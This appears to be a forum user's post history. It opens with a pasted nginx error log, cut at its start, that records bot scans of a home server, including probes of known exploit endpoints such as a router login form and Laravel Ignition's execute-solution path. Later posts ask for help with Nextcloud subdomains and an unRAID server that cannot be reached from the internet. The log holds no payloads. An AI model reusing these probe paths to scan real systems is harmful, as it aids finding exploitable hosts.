"/var/www/html/localstart.asp" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /localstart.asp HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:07 [error] 6905#6905: *72752 open() "/var/www/html/menu.aspx" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /menu.aspx HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:07 [error] 6906#6906: *72754 open() "/var/www/html/inicio.php" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /inicio.php HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:07 [error] 6906#6906: *72759 open() "/var/www/html/menu.jhtml" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /menu.jhtml HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:07 [error] 6905#6905: *72761 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:07 [error] 6906#6906: *72763 open() "/var/www/html/default.aspx" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /default.aspx HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:08 [error] 6906#6906: *72764 open() "/var/www/html/default.pl" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /default.pl HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:08 [error] 6905#6905: *72766 open() "/var/www/html/readme.txt" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /readme.txt HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:08 [error] 6905#6905: *72767 open() "/var/www/html/inicio.pl" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /inicio.pl HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:08 [error] 6905#6905: *72768 open() "/var/www/html/index.pl" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /index.pl HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:08 [error] 6905#6905: *72769 open() "/var/www/html/admin.jhtml" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /admin.jhtml HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:09 [error] 6905#6905: *72770 open() "/var/www/html/default.cfm" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /default.cfm HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:09 [error] 6905#6905: *72771 open() "/var/www/html/admin.asp" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /admin.asp HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:09 [error] 6905#6905: *72772 open() "/var/www/html/admin.pl" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /admin.pl HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:09 [error] 6905#6905: *72773 open() "/var/www/html/start.jsa" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /start.jsa HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:09 [error] 6905#6905: *72774 open() "/var/www/html/base.jsp" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /base.jsp HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:10 [error] 6905#6905: *72775 open() "/var/www/html/indice.cfm" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /indice.cfm HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:10 [error] 6905#6905: *72776 open() "/var/www/html/indice.cgi" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /indice.cgi HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:10 [error] 6905#6905: *72777 open() "/var/www/html/localstart.php" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /localstart.php HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:10 [error] 6905#6905: *72778 open() "/var/www/html/base.php" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /base.php HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:10 [error] 6905#6905: *72779 open() "/var/www/html/inicio.cfm" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /inicio.cfm HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:11 [error] 6905#6905: *72780 open() "/var/www/html/admin.jsp" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /admin.jsp HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:11 [error] 6905#6905: *72781 open() "/var/www/html/admin.jsa" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /admin.jsa HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:11 [error] 6905#6905: *72782 open() "/var/www/html/admin.shtml" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /admin.shtml HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:11 [error] 6905#6905: *72783 open() "/var/www/html/inicio.html" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /inicio.html HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:11 [error] 6905#6905: *72784 open() "/var/www/html/indice.jsp" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /indice.jsp HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:12 [error] 6905#6905: *72785 open() "/var/www/html/home.php" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /home.php HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:12 [error] 6905#6905: *72786 open() "/var/www/html/default.html" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /default.html HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:12 [error] 6905#6905: *72787 open() "/var/www/html/admin.cgi" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /admin.cgi HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:12 [error] 6905#6905: *72788 open() "/var/www/html/admin.cfm" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /admin.cfm HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:12 [error] 6905#6905: *72789 open() "/var/www/html/index.shtml" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /index.shtml HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:13 [error] 6905#6905: *72790 open() "/var/www/html/home.jsp" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /home.jsp HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:13 [error] 6905#6905: *72791 open() "/var/www/html/start.php" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /start.php HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:13 [error] 6905#6905: *72792 open() "/var/www/html/default.cgi" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /default.cgi HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:13 [error] 6905#6905: *72793 open() "/var/www/html/admin.aspx" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /admin.aspx HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:13 [error] 6905#6905: *72794 open() "/var/www/html/index.jhtml" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /index.jhtml HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:14 [error] 6905#6905: *72795 open() "/var/www/html/base.shtml" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /base.shtml HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:14 [error] 6905#6905: *72796 open() "/var/www/html/home.asp" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /home.asp HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:14 [error] 6905#6905: *72797 open() "/var/www/html/menu.asp" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /menu.asp HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:14 [error] 6905#6905: *72798 open() "/var/www/html/base.pl" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /base.pl HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:14 [error] 6905#6905: *72799 open() "/var/www/html/menu.pl" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /menu.pl HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:15 [error] 6905#6905: *72800 open() "/var/www/html/home.pl" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /home.pl HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:15 [error] 6905#6905: *72801 open() "/var/www/html/home.jhtml" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /home.jhtml HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:15 [error] 6905#6905: *72802 open() "/var/www/html/localstart.pl" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /localstart.pl HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:15 [error] 6905#6905: *72803 open() "/var/www/html/start.asp" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /start.asp HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:00:15 [error] 6905#6905: *72804 open() "/var/www/html/base.jhtml" failed (2: No such file or directory), client: 139.144.52.241, server: localhost-nginx-proxy-manager, request: "GET /base.jhtml HTTP/1.1", host: "X-X-X-X.client.mchsi.com" 2022/12/03 00:07:39 [error] 6905#6905: *72879 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 194.55.186.216, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "X.X.X.X:80", referrer: "http://X.X.X.X:80/admin/login.asp" 2022/12/03 00:47:54 [error] 6944#6944: *72884 "/var/www/html/console/index.html" is not found (2: No such file or directory), client: 152.89.196.211, server: localhost-nginx-proxy-manager, request: "GET /console/ HTTP/1.1", host: "X.X.X.X:80" 2022/12/03 01:26:35 [error] 6944#6944: *72894 open() "/var/www/html/Autodiscover/Autodiscover.xml" failed (2: No such file or directory), client: 152.89.196.211, server: localhost-nginx-proxy-manager, request: "POST /Autodiscover/Autodiscover.xml HTTP/1.1", host: "X.X.X.X:80" 2022/12/03 01:50:46 [error] 6944#6944: *72913 open() "/var/www/html/_ignition/execute-solution" failed (2: No such file or directory), client: 152.89.196.211, server: localhost-nginx-proxy-manager, request: "GET /_ignition/execute-solution HTTP/1.1", host: "X.X.X.X:80" 2022/12/03 03:15:59 [error] 6944#6944: *72924 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 141.255.166.2, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "X.X.X.X8:80", referrer: "http://X.X.X.X:80/admin/login.asp"
  10. I'm having an issue where I hadn't used some of my subdomains for some time with nextcloud. I have been using a duckdns link for when my public IP changed. Now I am getting warnings about some certificates expiring and I've found that none of subdomains I've had for years now with Google are working however my duckdns link is still accessing nextcloud properly and when I use a browser to try the subdomains I'm getting that "congratulations you've successfully started the Nginx Proxy Manager". So if from a browser off my LAN my duckdns link is working what is causing my subdomains to not load. For example b***.***server.com and *****.duckdns.org both go to nextcloud but only duckdns loads it. Thanks in advance for any help!!
  11. I'm having an issue where I hadn't used some of my subdomains for some time with nextcloud. I have been using a duckdns link for when my public IP changed. Now I am getting warnings about some certificates expiring and I've found that none of subdomains I've had for years now with Google are working however my duckdns link is still accessing nextcloud properly and when I use a browser to try the subdomains I'm getting that "congratulations you've successfully started the Nginx Proxy Manager". So if from a browser off my LAN my duckdns link is working what is causing my subdomains to not load. For example b***.***server.com and *****.duckdns.org both go to nextcloud but only duckdns loads it. Thanks in advance for any help!!
  12. I moved my array from an HPE microserver to an r710 and I assigned the r710 the same IP as I'd assigned the HPE. Everything is working fine and is accessible via LAN but I can't access anything from the net. Would deleting the network.cfg file fix this? Could you look at my settings and suggest anything? Thank you!
  13. Hey everyone I'm trying to find a relevant forum to my issue. I moved my array from an HPE microserver to an r710. Through my router I assigned the r710 the same IP as the HPE. Everything is accessible via LAN but I can't access anything from the net. Would anyone be able to help?
  14. Hey I moved my unRAID from an HPE microserver to an r710. I assigned it the same IP via my router and by LAN everything works fine but I can't access anything from the internet. Anyone know what the problem might be? I didn't change anything but something was obviously overlooked.
  15. Hey guys I moved my unraid from an HPE microserver to an r710. Everything booted fine but I can't reach my dockers like nextcloud, etc. from the internet but it's fine on my LAN. I assigned the "new " server the same IP as the old HPE had but that didn't help. Any ideas?